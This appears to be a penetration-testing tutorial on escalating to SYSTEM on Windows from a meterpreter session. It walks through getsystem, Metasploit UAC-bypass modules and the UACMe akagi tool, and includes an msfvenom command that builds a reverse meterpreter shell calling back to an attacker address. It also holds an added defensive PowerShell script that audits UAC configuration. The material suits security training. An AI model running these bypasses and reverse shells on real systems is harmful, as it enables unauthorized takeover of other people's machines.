Introduction

If we have gained a meterpreter session on a Windows machine, a quick way to attempt to gain NT AUTHORITY\SYSTEM (the most powerful non-interactive account) is to use the command:

    getsystem

This does not always work and may well crash the remote machine, so it needs to be used with caution. The command tries several privilege escalation techniques in turn, and it only works on Windows. If we want to try only one specific technique, we can use the -t flag along with the number of that technique:

    getsystem -t 1

One problem we may encounter is User Account Control being enabled. We can find this out by using:

    post/windows/gather/win_privs

If the UAC Enabled column is set to True, we will need to bypass UAC before running getsystem. We will need to background the meterpreter session and then use:

    search bypassuac

We can use the latest bypassuac module against the meterpreter session id:

    use exploit/windows/local/bypassuac

followed by:

    set session 2

or whatever session id we are targeting. If this works when we run it, a new meterpreter session will open. We will then be able to interact with it and run the getsystem command again.

Another way to attempt to bypass UAC via a meterpreter session is to background the session and then try:

    use post/multi/recon/local_exploit_suggester

This will list various modules we can try. We can try these in turn until we find one which works, for example:

    use exploit/windows/local/bypassuac_dotnet_profiler

UAC

User Account Control is a security feature in Windows which opens a prompt when a user attempts to execute a file or command which requires elevated privileges. If a low-privileged user attempts this, the UAC credential prompt will ask for a local admin username:password, and if a local admin account attempts it, the consent prompt will ask for confirmation. Either way, if we are interacting with the victim machine via a meterpreter or cmd session, we will not be able to continue, as we will not be able to respond to the UAC prompt. This means we need to find ways to bypass UAC completely. In order to do this, we will need to have a session for a user who is in the local admin group on the victim machine. The technique which we use to bypass UAC will depend on the OS version and build running on the victim machine.
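The following PowerShell script is an added example and not part of the original page. It reports, from a defender's point of view, the two things the paragraph above hinges on: whether the current logon is a split-token local admin running at medium integrity (the precondition for a UAC bypass), and how UAC itself is configured. The registry values under the Policies\System key and the whoami /groups columns are standard Windows; the assessment strings are the script's own. The "Always notify" level (ConsentPromptBehaviorAdmin = 2 with PromptOnSecureDesktop = 1) is the hardened setting, because the auto-elevate mechanism that most bypass techniques abuse only operates at the weaker default level.

```powershell
# Added example (not from the original page): audit the UAC posture of this host
# and the elevation state of the current token. Run in an ordinary (non-elevated)
# PowerShell session on the machine being assessed.

$uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $uacKey

# 1 = UAC enabled, 0 = UAC disabled entirely
$enableLua   = [int]$uac.EnableLUA
# 2 = always notify, 5 = default (notify only when apps change settings), 0 = never
$adminPrompt = [int]$uac.ConsentPromptBehaviorAdmin
# 1 = prompt is shown on the secure desktop, 0 = on the interactive desktop
$secureDesk  = [int]$uac.PromptOnSecureDesktop

# whoami /groups lists every group SID in the token plus the integrity label;
# a filtered (split) admin token shows Administrators as "Group used for deny only".
$groups    = whoami /groups /fo csv | ConvertFrom-Csv
$adminRow  = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }   # BUILTIN\Administrators
$integrity = ($groups | Where-Object { $_.SID -like 'S-1-16-*' }).'Group Name'

$inAdminGroup = $null -ne $adminRow
$splitToken   = $inAdminGroup -and ($adminRow.Attributes -match 'deny only')

$assessment = if ($enableLua -eq 0) {
    'UAC is disabled: every admin logon runs fully elevated with no prompt at all.'
} elseif ($adminPrompt -eq 2 -and $secureDesk -eq 1) {
    'UAC is at "Always notify": auto-elevate is not honoured, so prompt-free bypasses are blocked.'
} elseif ($splitToken) {
    'Split-token admin at default UAC level: this is the state UAC-bypass tooling targets.'
} elseif ($inAdminGroup) {
    'Admin token is already fully elevated in this session; no bypass is needed here.'
} else {
    'Current user is not a local administrator; UAC bypass does not apply to this token.'
}

[pscustomobject]@{
    User                       = $env:USERNAME
    LocalAdminGroupMember      = $inAdminGroup
    FilteredSplitToken         = $splitToken
    IntegrityLevel             = $integrity
    EnableLUA                  = $enableLua
    ConsentPromptBehaviorAdmin = $adminPrompt
    PromptOnSecureDesktop      = $secureDesk
    Assessment                 = $assessment
} | Format-List
```

On a default Windows 10 workstation where the logged-on user is a local administrator, the output shows FilteredSplitToken = True, IntegrityLevel = Mandatory Label\Medium Mandatory Level and ConsentPromptBehaviorAdmin = 5, which is exactly the condition the rest of this page relies on; raising the slider to "Always notify" changes the assessment line and is the configuration change that closes off the auto-elevate class of bypasses.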

UACMe

UACMe is a tool available from its GitHub repository. It has many ways to bypass UAC; we will need to find one which works for the Windows environment we are targeting. UACMe works by abusing the built-in Windows AutoElevate mechanism. It uses an executable called akagi. The binary will need to be compiled from the source code in the GitHub repository, as it is written mostly in C.

The akagi binary can be used to bypass UAC and then run another executable, such as a malicious reverse shell. We can generate a reverse meterpreter shell using:

    sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.8 LPORT=1234 -f exe > rs.exe

We then need to transfer this reverse shell along with the akagi binary to the victim machine before starting a handler in msfconsole which uses the same payload as we used in the reverse shell:

    set payload windows/meterpreter/reverse_tcp

Once we have transferred the necessary files to the victim machine and started a handler, we can use:

    .\Akagi64.exe 23 C:\Temp\rs.exe

The first parameter passed to the akagi binary is the number of the method to try; this will depend on the environment we find on the victim machine (33 is a good one to try against Windows 10 machines). This will hopefully execute the reverse shell specified as the second parameter with elevated privileges, since UAC has been bypassed.